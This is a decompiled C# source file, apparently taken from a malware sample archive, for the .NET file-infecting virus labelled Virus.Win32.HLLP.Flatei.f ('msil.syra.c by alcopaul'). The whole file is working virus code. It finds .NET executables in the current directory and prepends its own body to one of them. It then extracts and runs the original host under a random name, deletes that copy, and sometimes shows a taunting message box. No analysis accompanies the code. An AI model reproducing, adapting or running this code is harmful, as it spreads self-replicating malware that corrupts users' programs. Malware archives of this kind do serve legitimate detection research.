MalwareSourceCode/MSIL/Virus/Win32/H/Virus.Win32.HLLP.Flatei.f-b13d9fb226c2ebac8fd101849be5e5cc0b190df469720bf55f3a3163505550aa/msil_syra_c.cs

// Decompiled with JetBrains decompiler
// Type: msil_syra_c
// Assembly: syrac, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 59A30167-FC92-46E3-93AD-211B753EB8EF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.HLLP.Flatei.f-b13d9fb226c2ebac8fd101849be5e5cc0b190df469720bf55f3a3163505550aa.exe

using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;

internal class msil_syra_c
{
  public static void Main(string[] args)
  {
    Module module = Assembly.GetExecutingAssembly().GetModules()[0];
    foreach (string file in Directory.GetFiles(Directory.GetCurrentDirectory(), "*.exe"))
    {
      try
      {
        AssemblyName.GetAssemblyName(file);
        if (!(msil_syra_c.Sha1(module.FullyQualifiedName) == msil_syra_c.Sha1(file)))
        {
          try
          {
            msil_syra_c.Infect(file);
            break;
          }
          catch
          {
          }
        }
      }
      catch
      {
      }
    }
    FileStream input = new FileStream(module.FullyQualifiedName, FileMode.OpenOrCreate, FileAccess.Read);
    BinaryReader binaryReader = new BinaryReader((Stream) input);
    int length = (int) input.Length - 5632;
    binaryReader.BaseStream.Seek(5632L, SeekOrigin.Begin);
    byte[] buffer = new byte[(int) checked ((uint) length)];
    int count = length;
    int index = 0;
    int num1;
    for (; count > 0; count -= num1)
    {
      num1 = binaryReader.Read(buffer, index, count);
      if (num1 != 0)
        index += num1;
      else
        break;
    }
    binaryReader.Close();
    int num2 = new Random().Next(2000);
    BinaryWriter binaryWriter = new BinaryWriter((Stream) new FileStream("p" + (object) num2 + "h.exe", FileMode.OpenOrCreate, FileAccess.Write));
    binaryWriter.BaseStream.Seek(0L, SeekOrigin.Begin);
    binaryWriter.Write(buffer);
    binaryWriter.Close();
    string currentDirectory = Directory.GetCurrentDirectory();
    msil_syra_c.w32api.ShellExecute(0, (string) null, "p" + (object) num2 + "h.exe", (string) null, currentDirectory, 1);
    do
    {
      try
      {
        File.Delete("p" + (object) num2 + "h.exe");
      }
      catch
      {
      }
    }
    while (File.Exists("p" + (object) num2 + "h.exe"));
    if (new Random().Next(4) != 3)
      return;
    msil_syra_c.w32api.MessageBox(0, "::::only SHA1gging .NET files::::", "msil.syra.c by alcopaul", 0U);
  }

  public static void Infect(string host)
  {
    BinaryReader binaryReader1 = new BinaryReader((Stream) new FileStream(Assembly.GetExecutingAssembly().GetModules()[0].FullyQualifiedName, FileMode.OpenOrCreate, FileAccess.Read));
    binaryReader1.BaseStream.Seek(0L, SeekOrigin.Begin);
    byte[] buffer1 = new byte[5632];
    int count = 5632;
    int index1 = 0;
    int num1;
    for (; count > 0; count -= num1)
    {
      num1 = binaryReader1.Read(buffer1, index1, count);
      if (num1 != 0)
        index1 += num1;
      else
        break;
    }
    binaryReader1.Close();
    FileStream input = new FileStream(host, FileMode.OpenOrCreate, FileAccess.Read);
    BinaryReader binaryReader2 = new BinaryReader((Stream) input);
    binaryReader2.BaseStream.Seek(0L, SeekOrigin.Begin);
    byte[] buffer2 = new byte[(int) checked ((uint) input.Length)];
    int length = (int) input.Length;
    int index2 = 0;
    int num2;
    for (; length > 0; length -= num2)
    {
      num2 = binaryReader2.Read(buffer2, index2, length);
      if (num2 != 0)
        index2 += num2;
      else
        break;
    }
    binaryReader2.Close();
    BinaryWriter binaryWriter = new BinaryWriter((Stream) new FileStream(host, FileMode.OpenOrCreate, FileAccess.Write));
    binaryWriter.BaseStream.Seek(0L, SeekOrigin.Begin);
    binaryWriter.Write(buffer1);
    binaryWriter.Write(buffer2);
    binaryWriter.Close();
  }

  public static string Sha1(string data)
  {
    BinaryReader binaryReader = new BinaryReader((Stream) new FileStream(data, FileMode.OpenOrCreate, FileAccess.Read));
    binaryReader.BaseStream.Seek(0L, SeekOrigin.Begin);
    byte[] buffer = new byte[2048];
    int count = 2048;
    int index = 0;
    int num;
    for (; count > 0; count -= num)
    {
      num = binaryReader.Read(buffer, index, count);
      if (num != 0)
        index += num;
      else
        break;
    }
    binaryReader.Close();
    return msil_syra_c.BytesToHexString(new SHA1CryptoServiceProvider().ComputeHash(buffer));
  }

  private static string BytesToHexString(byte[] bytes)
  {
    StringBuilder stringBuilder = new StringBuilder(64);
    for (int index = 0; index < bytes.Length; ++index)
      stringBuilder.Append(string.Format("{0:X2}", (object) bytes[index]));
    return stringBuilder.ToString();
  }

  public class w32api
  {
    [DllImport("shell32.dll", CharSet = CharSet.Auto)]
    public static extern int ShellExecute(
      int hWnd,
      string oper,
      string file,
      string param,
      string dir,
      int type);

    [DllImport("user32.dll", CharSet = CharSet.Auto)]
    public static extern int MessageBox(int hWnd, string text, string caption, uint type);
  }
}